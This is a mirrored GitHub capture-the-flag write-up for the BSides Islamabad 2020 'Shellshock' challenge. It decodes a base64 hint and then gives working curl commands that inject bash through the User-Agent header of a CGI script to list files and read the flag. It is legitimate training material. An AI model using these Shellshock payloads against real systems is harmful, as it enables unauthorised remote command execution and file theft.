CTF-Writeups/BsidesIslamabad 2020/Shellshock.md at 343291ad42c37f53f5ba5942a2eabe96d207bab5

Mirrors/CTF-Writeups

Fork 0

mirror of https://github.com/AbdullahRizwan101/CTF-Writeups synced 2024-09-20 06:11:56 +00:00

AbdullahRizwan101 2fa4a3e96b

Update Shellshock.md

2020-11-08 07:07:49 -05:00

1.4 KiB

Raw Blame History

Looking at the source code we find base64 encoded text

Like the way you think spidey Y2dpLWJpbi90ZXN0LnNo

On decoding

I search on google about cgi-bin and found that they are mostly vulnerable to shellshock that allows execution of bash commands

On refering to this blog post

https://wywyit.medium.com/ritsec-fall-2018-ctf-week-6-45d414035c76

I used

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'find / -type "*.txt"'" http://challenges.ctfd.io:30328/cgi-bin/test.sh

And it gave me a bunch of files

At the bottom I found

/usr/lib/python3.8/LICENSE.txt                                            
/tmp/bash-4.3/doc/article.txt                                             
/tmp/bash-4.3/doc/fdl.txt                                                 
/tmp/bash-4.3/examples/INDEX.txt                                          
/home/admin/root.txt                                                                                                                                
/home/herman/user.txt

Bsides Islamabad# curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /home/herman/user.txt'" http://challenges.ctfd.io:30328/cgi-bin/test.sh

Bsides-PK-Fl4g{sinister_six}

And that was our flag !

1.4 KiB Raw Blame History

1.4 KiB

Raw Blame History